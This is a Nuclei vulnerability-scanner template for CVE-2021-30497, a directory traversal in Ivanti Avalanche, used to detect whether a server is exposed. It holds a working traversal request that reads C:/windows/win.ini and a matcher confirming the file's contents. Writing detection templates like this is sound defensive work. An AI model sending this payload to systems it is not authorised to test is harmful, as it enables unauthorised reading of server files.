nuclei-templates/cves/2021/CVE-2021-30497.yaml

25 lines
533 B
YAML
Raw Normal View History

id: CVE-2021-30497
info:
name: Ivanti Avalanche Directory Traversal
author: gy741
severity: high
reference: https://ssd-disclosure.com/ssd-advisory-ivanti-avalanche-directory-traversal/
tags: cve,cve2021,avalanche,traversal
requests:
- method: GET
path:
- "{{BaseURL}}/AvalancheWeb/image?imageFilePath=C:/windows/win.ini"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "for 16-bit app support"
- type: status
status:
- 200